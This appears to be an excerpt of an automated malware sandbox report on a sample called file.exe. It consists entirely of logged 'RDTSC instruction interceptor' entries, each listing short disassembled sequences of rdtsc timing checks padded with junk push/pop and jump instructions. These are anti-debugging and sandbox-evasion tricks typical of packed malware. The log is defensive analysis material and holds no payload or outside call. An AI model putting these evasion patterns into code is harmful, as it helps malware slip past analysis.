                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196222 second address: 1196233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F6F31405BD6h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11967E9 second address: 11967EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11967EE second address: 1196826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F6F31405BE1h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007F6F31405BD6h 0x00000018 jmp 00007F6F31405BE4h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196826 second address: 1196839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196839 second address: 1196858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6F31405BE9h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196B54 second address: 1196B63 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jbe 00007F6F31ADDF66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196B63 second address: 1196B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 push edi 0x00000008 jbe 00007F6F31405BD6h 0x0000000e pop edi 0x0000000f jmp 00007F6F31405BDDh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119A9EC second address: 119AA04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119AA04 second address: 119AA08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119AA08 second address: 119AA0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119AA0E second address: 119AA2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F6F31405BD6h 0x00000009 jmp 00007F6F31405BE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119ABC0 second address: 119ABE2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F6F31ADDF74h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119ABE2 second address: 119ABE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119ABE6 second address: 119AC2B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F6F31ADDF77h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 jmp 00007F6F31ADDF76h 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c jno 00007F6F31ADDF66h 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119AD69 second address: 119AD6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119AD6D second address: 119AD89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6F31ADDF6Bh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119AEB5 second address: 119AEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jne 00007F6F31405BD6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119AEC4 second address: 119AEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6F31ADDF78h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119B1A0 second address: 119B1A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119B1A8 second address: 119B1AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119B1AD second address: 119B1CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F31405BE8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119B330 second address: 119B334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119B660 second address: 119B674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F31405BDFh 0x00000009 pop ecx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119B674 second address: 119B679 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119B679 second address: 119B681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A0002 second address: 11A0042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 js 00007F6F31ADDF66h 0x0000000c jmp 00007F6F31ADDF79h 0x00000011 popad 0x00000012 jmp 00007F6F31ADDF76h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A0042 second address: 11A0046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A235B second address: 11A2361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A9CCE second address: 11A9CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A9CD7 second address: 11A9CE7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6F31ADDF66h 0x00000008 jg 00007F6F31ADDF66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A9CE7 second address: 11A9CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7EBA second address: 11A7EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6F31ADDF6Dh 0x0000000b jno 00007F6F31ADDF66h 0x00000011 popad 0x00000012 jmp 00007F6F31ADDF71h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7EE5 second address: 11A7F04 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F6F31405BE1h 0x0000000a pop ebx 0x0000000b jng 00007F6F31405BEAh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A830E second address: 11A8313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A848C second address: 11A8490 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A89B8 second address: 11A89BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8CCB second address: 11A8CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8CD1 second address: 11A8CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6F31ADDF6Ch 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8CE1 second address: 11A8CE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8CE9 second address: 11A8D10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F6F31ADDF6Eh 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8D10 second address: 11A8D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F6F31405BDBh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8D28 second address: 11A8D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A9471 second address: 11A949B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6F31405BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push esi 0x0000000c jmp 00007F6F31405BE6h 0x00000011 jg 00007F6F31405BE2h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A9B74 second address: 11A9B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F6F31ADDF66h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A9B83 second address: 11A9B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE5F2 second address: 11AE5F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2C90 second address: 11B2D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F31405BE9h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c jl 00007F6F31405BD6h 0x00000012 jnp 00007F6F31405BD6h 0x00000018 jmp 00007F6F31405BE4h 0x0000001d jmp 00007F6F31405BE4h 0x00000022 popad 0x00000023 jl 00007F6F31405BE2h 0x00000029 js 00007F6F31405BD6h 0x0000002f jg 00007F6F31405BD6h 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F6F31405BDBh 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2E6D second address: 11B2E87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6F31ADDF74h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BEB20 second address: 11BEB31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDBh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BEB31 second address: 11BEB3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F6F31ADDF66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BEB3B second address: 11BEB5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE8h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BEB5C second address: 11BEB72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F6F31ADDF66h 0x00000010 jc 00007F6F31ADDF66h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BEB72 second address: 11BEB78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BEB78 second address: 11BEB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F6F31ADDF6Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE57C second address: 11BE581 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE6A4 second address: 11BE6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C42CA second address: 11C4302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F6F31405BD6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c jng 00007F6F31405BDCh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jp 00007F6F31405BECh 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8C98 second address: 11C8C9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0D0A second address: 11D0D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0B33 second address: 11D0B56 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6F31ADDF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6F31ADDF79h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0B56 second address: 11D0B5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D8C30 second address: 11D8C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D8C3A second address: 11D8C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6F31405BDDh 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D8C4F second address: 11D8C55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D8C55 second address: 11D8C59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D9055 second address: 11D9059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDBB7 second address: 11DDBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDBBB second address: 11DDBC7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6F31ADDF66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDBC7 second address: 11DDBD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F6F31405BD6h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDBD3 second address: 11DDBEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6F31ADDF6Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDBEA second address: 11DDBF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6F31405BD6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA995 second address: 11EA9BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F31ADDF72h 0x00000009 jnp 00007F6F31ADDF66h 0x0000000f ja 00007F6F31ADDF66h 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA9BB second address: 11EA9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6F31405BE9h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA9DD second address: 11EA9F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA9F8 second address: 11EA9FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA9FE second address: 11EAA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FFC29 second address: 11FFC38 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6F31405BDAh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FFC38 second address: 11FFC3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF812 second address: 11FF825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnc 00007F6F31405BDAh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF825 second address: 11FF829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A3A7 second address: 121A3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A3AD second address: 121A3B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219213 second address: 1219218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121963C second address: 121966D instructions: 0x00000000 rdtsc 0x00000002 js 00007F6F31ADDF87h 0x00000008 jmp 00007F6F31ADDF74h 0x0000000d jmp 00007F6F31ADDF6Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007F6F31ADDF66h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121966D second address: 121967C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121967C second address: 1219690 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6F31ADDF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F6F31ADDF6Eh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219BEB second address: 1219BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jne 00007F6F31405BDCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219DAD second address: 1219DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219DB5 second address: 1219DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219F0A second address: 1219F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6F31ADDF66h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219F19 second address: 1219F29 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6F31405BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219F29 second address: 1219F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219F2D second address: 1219F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B9F4 second address: 121BA26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F6F31ADDF66h 0x0000000c jmp 00007F6F31ADDF71h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6F31ADDF72h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E425 second address: 121E42C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E42C second address: 121E442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F6F31ADDF6Ch 0x00000010 je 00007F6F31ADDF66h 0x00000016 rdtsc
